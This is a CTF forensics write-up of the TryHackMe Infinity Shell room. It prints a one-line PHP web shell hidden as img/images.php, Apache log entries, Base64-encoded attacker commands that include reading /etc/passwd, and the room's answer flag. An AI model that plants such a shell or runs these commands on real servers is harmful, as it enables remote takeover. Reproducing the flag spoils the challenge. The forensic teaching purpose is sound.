Introduction

In the TryHackMe Infinity Shell room, I tackled a web application forensics challenge focused on detecting a malicious PHP web shell on a CMS site. This walkthrough covers discovering the shell, decoding Base64 commands, and extracting the CTF flag, while demonstrating how attackers hide files in directories like img/ or uploads/ for remote code execution. Perfect for beginners learning web security or CTF enthusiasts sharpening forensic skills.

Identifying the Web Application & Finding the Malicious Web Shell

I started this challenge by looking for a web application on the box — the usual first step in web application forensics and TryHackMe CTFs. From the web root I found a CMS project that looked promising:

cd /var/www/html/
ls

Seeing CMSsite-master told me this was a CMS-based site (common attack surface), so I dove into that directory.

cd CMSsite-master
ls -la

Hunting for suspicious files

Attackers commonly hide web shells in places that look innocuous — img/, uploads/, includes/, etc. I listed the img/ directory and found a tiny images.php file next to normal image files:

cd img/
ls -la

When I examined images.php it was immediately suspicious:

cat images.php
<?php system(base64_decode($_GET['query'])); ?>

This single line is a classic web shell pattern: it accepts base64-encoded commands via a query parameter and executes them on the server. That’s the attacker’s entry point — a direct remote command execution vector. At this point I knew I had to trace how the shell was used and what commands the attacker ran.

Extracting web shell usage from Apache logs

I filtered the Apache access logs for requests to images.php to get a clear timeline of what the attacker ran through the web shell. Instead of reading every line by hand, I searched for requests containing images.php? and pulled the Base64 payloads that were passed in the query parameter. That gave me a concise list of encoded commands to decode and analyse.

cd /var/log/apache2/
cat other_vhosts_access.log.1 | grep -r 'images.php?'

The Apache logs contained several GET requests targeting images.php, each passing Base64-encoded commands in the query parameter.

GET /CMSsite-master/img/images.php?query=ZWNobyAnVEhNe3...ScK HTTP/1.1

Decoding the commands

I decoded each Base64 string to reveal the actual shell commands the attacker executed. Here are the results:

d2hvYW1pCg==
bHMK
ZWNobyAnVEhNe3N1cDNyXzM0c3lfdzNic2gzbGx9Jwo=
aWZjb25maWcK
Y2F0IC9ldGMvcGFzc3dkCg==
aWQK

What is the flag?

THM{sup3r_34sy_w3bsh3ll}

Conclusion

The Infinity Shell room on TryHackMe provided a hands-on experience in web application forensics and web shell analysis. By carefully inspecting the CMS directories, identifying the malicious images.php web shell, and decoding Base64 commands from Apache logs, I was able to reconstruct the attacker’s actions and retrieve the CTF flag: THM{sup3r_34sy_w3bsh3ll}.

This challenge highlights the importance of monitoring web directories for suspicious files, analyzing server logs for unusual activity, and understanding how attackers leverage hidden web shells for remote code execution. Whether you are new to CTFs or looking to sharpen your web forensics and penetration testing skills, this room reinforces critical skills for identifying and mitigating web-based attacks.